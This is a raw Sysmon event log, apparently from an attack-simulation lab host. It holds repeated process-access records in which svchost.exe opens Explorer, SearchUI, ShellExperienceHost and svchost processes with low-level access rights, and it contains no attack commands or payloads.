11:30:54.827{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AF-6215-C200-000000003802}4300C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000300054Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:30:54.827{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AF-6215-C200-000000003802}4300C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000300053Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:30:54.827{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AF-6215-C200-000000003802}4300C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000300052Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:30:54.827{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AF-6215-C200-000000003802}4300C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000300051Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:30:54.827{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AF-6215-C200-000000003802}4300C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000300050Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:30:54.827{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AF-6215-C200-000000003802}4300C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000300049Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:30:54.827{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AF-6215-C100-000000003802}5080C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000300048Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:30:54.827{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AF-6215-C100-000000003802}5080C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000300047Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:30:54.827{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AF-6215-C100-000000003802}5080C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000300046Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:30:54.827{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AF-6215-C100-000000003802}5080C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000300045Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:30:54.827{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AF-6215-C100-000000003802}5080C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000300044Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:30:54.827{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AF-6215-C100-000000003802}5080C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000300043Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:30:54.827{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AF-6215-C100-000000003802}5080C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000300042Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:30:54.827{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AF-6215-C100-000000003802}5080C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000300041Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:30:54.827{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2B00-000000003802}2012C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000300040Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:30:54.827{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2B00-000000003802}2012C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000300039Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:30:54.827{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000300038Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:30:54.827{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000300037Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:30:54.827{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000300036Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:30:54.827{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000300035Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:30:54.827{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000300034Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:30:54.827{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000300033Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:30:54.827{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000300032Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:30:54.827{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000300031Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:30:54.827{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000300030Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:30:54.827{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000300029Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:30:54.827{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000300028Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:30:54.827{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000300027Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:30:54.827{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000300026Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:30:54.827{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000300025Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:30:54.827{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000300024Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 